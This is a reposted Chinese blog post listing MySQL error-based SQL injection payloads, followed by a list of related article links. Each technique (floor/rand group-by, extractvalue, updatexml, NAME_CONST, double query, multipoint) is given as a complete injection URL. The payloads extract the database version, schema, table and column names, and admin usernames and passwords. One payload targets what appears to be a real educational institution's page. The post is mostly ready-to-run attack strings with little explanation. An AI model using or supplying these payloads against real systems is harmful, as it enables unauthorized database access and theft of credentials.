MYSQL报错注入方法整理
来源:互联网 发布:install ubuntu 编辑:程序博客网 时间:2024/06/09 17:58
1、通过floor暴错
/*数据库版本*/
SQL
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*连接用户*/
SQL
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*连接数据库*/
SQL
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴库*/
SQL
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴表*/
SQL
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴字段*/
SQL
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴内容*/
SQL
http://www.hackblog.cn/sql.php?id=1 and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
2、ExtractValue(有长度限制,最长32位)
SQL
http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e, (select @@version),0x7e))http://www.hackblog.cn/sql.php?id=1 and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))
3、UpdateXml(有长度限制,最长32位)
SQL
http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)http://www.hackblog.cn/sql.php?id=1 and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
4、NAME_CONST(适用于低版本)
SQL
http://wlkc.zjtie.edu.cn/qcwh/content/detail.php?id=330&sid=19&cid=261 and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)--
5、Error based Double Query Injection (http://www.vaibs.in/error-based-double-query-injection/)
/*数据库版本*/
SQL
http://www.hackblog.cn/sql.php?id=1 or 1 group by concat_ws(0x7e,version(),floor(rand(0)*2)) having min(0) or 1
6、Multipoint(新方法)
/*数据库版本*/
SQL
http://www.hackblog.cn/sql.php?id=1 and 1=(select multipoint((select * from(select * from(select version())f)x)))
大家自己找关键字替换自己想要查询的东西。
本文由Hack Blog原创,如需转载注明原文链接http://www.hackblog.cn/post/36.html
阅读全文
0 0
- MYSQL报错注入方法整理
- mysql报错注入(显错注入)整理
- mysql报错注入(显错注入)整理
- mysql报错注入
- MySQL 报错注入
- 新型mysql报错注入
- MYSQL updatexml报错注入
- Mysql 报错注入的原理探索
- 十种MySQL报错注入
- MYSQL高版本报错注入技巧-利用NAME_CONST注入
- 报错注入的一些整理 By Assassin
- scrapy插入mysql报错问题整理
- SQL注入--报错注入
- mysql报错进行回显注入的原理
- 经典的MySQL Duplicate entry报错注入
- Mysql报错注入简单测试模型 20160416
- Mysql报错注入原理分析(count()、rand()、group by)
- Mysql报错注入原理分析(count()、rand()、group by)
- Hadoop学习笔记(一)
- 关于spring的配置文件总结
- Java的插入排序
- IP 地址冲突检测(解决某种情况下 arp 机制无效的问题)
- effective C++ 条款十七解读
- MYSQL报错注入方法整理
- Linux---gcc 编译
- MySQL的存储过程
- c3p0在hibernate中的配置
- spring之Bean的生命周期
- Linux内核编译运行
- 客户流失预测--基于R语言C5.0
- [POJ
- uniq -- 文本去重工具